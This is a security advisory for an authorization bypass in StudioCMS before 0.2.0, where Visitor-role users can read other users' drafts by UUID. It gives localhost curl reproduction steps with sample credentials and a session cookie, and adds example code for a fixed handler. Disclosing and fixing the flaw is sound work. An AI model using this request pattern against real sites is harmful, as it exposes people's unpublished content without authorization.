GHSA-8cw6-53m5-4932

Published: 27 Jan 2026
Source: github
GitHub: reviewed
CVSS3: 6.5

Description

StudioCMS has Authorization Bypass Through User-Controlled Key

Summary

StudioCMS contains a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users.

Details

The Issue: The endpoint /dashboard/content-management/edit?edit={UUID} validates user authentication but does NOT validate:

  1. User role (should require Editor/Admin/Owner)
  2. Content ownership (should verify the draft belongs to the user)

This allows users with "Visitor" role (lowest privilege) to access draft content created by Editor/Admin/Owner users by directly accessing the edit URL with the content UUID.
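The two checks the advisory says are missing (role, then object ownership), shown as an added example next to the authentication-only pattern it describes. This is illustrative code, not StudioCMS's own handler: the role names and ranks, the draft and session shapes, the in-memory store, and the decision to let Admin/Owner read any draft are assumptions.

```javascript
// Added example, not StudioCMS code. Role ranks, data shapes and the
// Admin/Owner override below are assumptions for illustration.
const ROLE_RANK = { visitor: 0, editor: 1, admin: 2, owner: 3 };

// Constructed sample data: one Editor-owned draft and four sessions.
const DRAFT_ID = 'bad87630-69a4-4cd6-bcb2-6965839dc148';
const drafts = new Map([
  [DRAFT_ID, { ownerId: 'u-dummy04', title: 'Unreleased post', draft: true }],
]);
const sessions = {
  editor:      { userId: 'u-dummy04', role: 'editor' },  // owns the draft
  otherEditor: { userId: 'u-dummy07', role: 'editor' },  // same role, not owner
  visitor:     { userId: 'u-dummy01', role: 'visitor' },
  admin:       { userId: 'u-admin',   role: 'admin' },
};

// Vulnerable pattern from the advisory: a valid session is the only gate,
// so any authenticated user can fetch any draft by UUID.
function editDraftVulnerable(session, uuid) {
  if (!session) return { status: 401 };
  const draft = drafts.get(uuid);
  return draft ? { status: 200, draft } : { status: 404 };
}

// Hardened handler: role gate first, then object-level ownership check.
function editDraftHardened(session, uuid) {
  if (!session) return { status: 401 };
  const rank = ROLE_RANK[session.role] ?? -1;
  // Visitor (rank 0) and unknown roles never reach the editor at all.
  if (rank < ROLE_RANK.editor) return { status: 403 };
  const draft = drafts.get(uuid);
  // Unknown and foreign drafts both answer 404 so the response does not
  // confirm that a guessed UUID exists.
  if (!draft) return { status: 404 };
  const privileged = rank >= ROLE_RANK.admin;  // assumed Admin/Owner override
  if (!privileged && draft.ownerId !== session.userId) return { status: 404 };
  return { status: 200, draft };
}
```

Checking the role before loading the object keeps the cheap test in front of the database lookup; the ownership test is what actually closes the BOLA.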

PoC

  • User A: Editor role (example username: dummy04)
  • User B: Visitor role (example username: dummy01)

Reproduction Steps:

Step 1 - Create draft as Editor:

  1. Login as User A (Editor role)
  2. Navigate to: http://localhost:4321/dashboard/content-management
  3. Create new content (it will stay as draft)
  4. After saving, note the UUID in the URL:
http://localhost:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148

Copy this UUID: bad87630-69a4-4cd6-bcb2-6965839dc148

Step 2 - Access draft as Visitor:

  1. Login as Visitor and get the auth_session cookie:
     curl -X POST "http://127.0.0.1:4321/studiocms_api/auth/login" -F 'username=dummy01' -F 'password=dummy01pass$'
  2. Proof of Visitor permission
  3. Access the Editor's draft using the UUID:
     curl "http://127.0.0.1:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148" -H "Cookie: auth_session=qvawh6zv23hc2spu6xx7pzgrnn4rpd3q" -v

Result: Returns full HTML page with draft content (200 OK)

Impact

Impact Scenarios:

  1. Information Disclosure:

    • Visitor users can read unpublished drafts containing sensitive information
    • Drafts may contain confidential business information, unreleased announcements, or proprietary content
    • Competitive intelligence could be gathered from draft content
  2. Privacy Violation:

    • Personal notes, work-in-progress content, or internal communications in drafts exposed
    • Violation of content creator privacy expectations
  3. Business Impact:

    • Premature disclosure of marketing campaigns, product launches, or announcements
    • Loss of competitive advantage if draft strategies are exposed
    • Potential compliance issues if drafts contain regulated information
  4. Complete RBAC Bypass:

    • The entire role-based access control system for draft content is bypassed
    • "Visitor" role becomes equivalent to "Editor" for read access to drafts
    • Undermines the trust model of multi-user content management

Packages

Name: studiocms (npm)
Affected versions: < 0.2.0
Fixed version: 0.2.0

EPSS: 0.0003 (percentile 8%, Low)

CVSS3: 6.5 Medium

Weaknesses

CWE-639
CWE-862

Related vulnerabilities

CVSS3: 6.5
nvd
10 days ago

StudioCMS is a server-side-rendered, Astro native, headless content management system. Versions prior to 0.2.0 contain a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users. Version 0.2.0 patches the issue.
